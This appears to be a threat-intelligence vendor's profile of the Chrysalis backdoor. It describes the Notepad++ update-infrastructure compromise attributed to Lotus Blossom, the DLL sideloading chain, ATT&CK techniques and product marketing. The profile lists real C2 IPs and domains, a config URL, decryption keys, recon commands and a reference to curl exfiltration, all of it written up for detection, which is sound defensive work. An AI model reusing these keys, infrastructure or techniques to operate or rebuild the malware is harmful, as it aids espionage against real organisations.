Chrysalis
Chrysalis is a previously undocumented custom Windows backdoor attributed in the provided reporting to the Chinese espionage group Lotus Blossom, also tracked as Raspberry Typhoon, Billbug, Spring Dragon, Thrip, Lotus Panda, Bronze Elgin, Red Salamander, and KTA529. It was publicly linked to the June-December 2025 compromise of Notepad++ update infrastructure, where attackers selectively redirected WinGUp updater traffic and delivered trojanized updates to targeted victims. Multiple sources in the content state the malware was deployed via DLL sideloading as part of a multi-stage supply-chain intrusion, often alongside Cobalt Strike Beacon, and was used against organizations including government, financial, IT, telecommunications, aviation, cloud hosting, energy, manufacturing, and software development entities, with victims reported in Vietnam, the Philippines, El Salvador, Australia, the United States, Europe, and Southeast Asia more broadly.
In the described Infection Chain 3, attackers dropped files into %APPDATA%\Bluetooth, including BluetoothService.exe, a malicious log.dll, and an encrypted payload file named BluetoothService. BluetoothService.exe was described as a legitimate executable renamed to resemble Bitdefender Submission Wizard and used to sideload log.dll. The malicious DLL exported LogInit and LogWrite and loaded, decrypted, and executed the Chrysalis payload. Reporting in the content also references the Warbird loader in connection with Chrysalis, and one source notes use of Microsoft Warbird code protection and custom API hashing as evasion measures. Another simulation artifact states behavior associated with Chrysalis included shellcode compilation/execution using svchost.exe with TinyCC flags such as -nostdlib -run.
Capabilities directly described in the content include persistence via registry-key modification or installation of new services, host and system information collection, remote command execution, a fully interactive reverse shell, remote process execution, file read/write/upload operations, file exfiltration, and a self-destruct sequence. The malware is described as operating in memory, using custom cryptography, and being designed for persistent, long-term espionage. One source states Chrysalis decrypted its main module using XOR with key "gQ2JR&9;" plus arithmetic operations, and decrypted configuration data using RC4 with key "qwhvb^435h&*7".
High-confidence infrastructure and indicators mentioned in the content include the malicious update.exe sample SHA-256 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566; C2 or related infrastructure 45.76.155.202, 45.77.31.210, 95.179.213.0, cdncheck.it.com, safe-dns.it.com, api.skycloudcenter.com, api.wiresguard.com, 59.110.7.32:8880, and 124.222.137.114:9999; and a specific Chrysalis configuration URL of https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf9cf0-6d8e24aaa821. Additional artifacts tied to delivery include %APPDATA%\Bluetooth\BluetoothService.exe, log.dll, the encrypted BluetoothService payload, and the use of malicious update.exe delivered through the compromised Notepad++ update channel.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Lotus Blossom exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor. | Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
This incident also arrives against a backdrop of Notepad++ already having faced a serious supply chain attack between June and December 2025, where state-sponsored Chinese hackers from the Lotus Blossom group compromised the official Notepad++ update infrastructure and delivered a malicious backdoor called Chrysalis to targeted users.
Threat group KTA529 (also known as Lotus Blossom, Spring Dragon, Billbug and Thrip) compromised Notepad++ hosting infrastructure between June and December 2025, intercepting update traffic to deliver a previously undocumented backdoor named CHRYSALIS.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniquesThreat actors routinely use this technique, known as brand impersonation or typosquatting, to serve malware, infostealers, or remote access trojans under the cover of a well-known application.
"The attackers intercepted and selectively redirected update requests from certain users to malicious servers"
Initial Access
4 techniquesNotepad++ already having faced a serious supply chain attack between June and December 2025, where state-sponsored Chinese hackers from the Lotus Blossom group compromised the official Notepad++ update infrastructure and delivered a malicious backdoor called Chrysalis to targeted users.
state-sponsored Chinese hackers from the Lotus Blossom group compromised the official Notepad++ update infrastructure and delivered a malicious backdoor called Chrysalis to targeted users.
"traffic tied to WinGUp, which updated the software, 'was occasionally redirected to malicious servers, resulting in the download of compromised executables'"
Execution
4 techniquesInsikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration.
Description Lotus Blossom TinyCC shellcode execution simulation. Svchost.exe executed with TinyCC compiler flags (-nostdlib -run) to simulate Chrysalis backdoor's shellcode compilation technique.
...Notepad++ ... intercept or redirect update traffic to download and execute an attacker-controlled installer and lead to arbitrary code execution with the privileges of the user.
Persistence
2 techniquesPrivilege Escalation
3 techniques"decrypt and execute the shellcode"; "execute shellcode"; "Warbird ... to execute shellcode"
Stealth
9 techniques"it uses Microsoft's proprietary and undocumented Warbird code protection and obfuscation framework"
"C:\\ProgramData\\USOShared\\svchost.exe-nostdlib,Masqueraded loader binary" and "...update.exe, Malicious updater"
"decrypt and execute the shellcode"; "execute shellcode"; "Warbird ... to execute shellcode"
"C:\\Users\\*\\AppData\\Local\\Temp\\u.bat,Cleanup / self-delete script"
"...Bluetooth\\Bluetooth,Encrypted shellcode blob (no extension)"
"Detects payload bytes in first 0x490 bytes in clipc.dll Warbird technique... scope = 'Microsoft signed DLL - clipc.dll'"
"...C:\\Users\\*\\AppData\\Roaming\\Bluetooth\\log.dll,Malicious sideloaded DLL" and "...Adobe\\Scripts\\alien.dll,Malicious DLL"
"Find Warbird clipc.dll shellcode loader strings" and YARA rules: "...Shellcode_Loader..." and "...Warbird... shellcode loader"
Credential Access
1 techniqueDiscovery
2 techniquesCollection
1 techniqueCommand and Control
3 techniques"including command-and-control communications tied to api.skycloudcenter.com"
YARA rule includes domains/paths such as "api.skycloudcenter.com" and URIs like "/api/update/v1", "/api/FileUpload/submit", "/api/getInfo/v1"
The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.
Exfiltration
2 techniquesInsikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration.
Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration... Block or alert on curl.exe uploading files to temp[.]sh
Impact
1 technique"attackers... allowing them to maliciously redirect traffic until Dec. 2, 2025"
IOCs tracked for this family
8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
44 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malicious backdoor delivered via a supply chain compromise of the official Notepad++ update infrastructure to targeted users.
A custom backdoor delivered through the compromised Notepad++ update mechanism during Lotus Blossom's campaign.
공급망 침해 과정에서 배포된 백도어로, 감염 후 시스템 정보 수집, 원격 명령 실행, 파일 유출을 가능하게 한다.
Backdoor deployed via a Notepad++ supply chain compromise, enabling system information collection, remote command execution, and file exfiltration.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.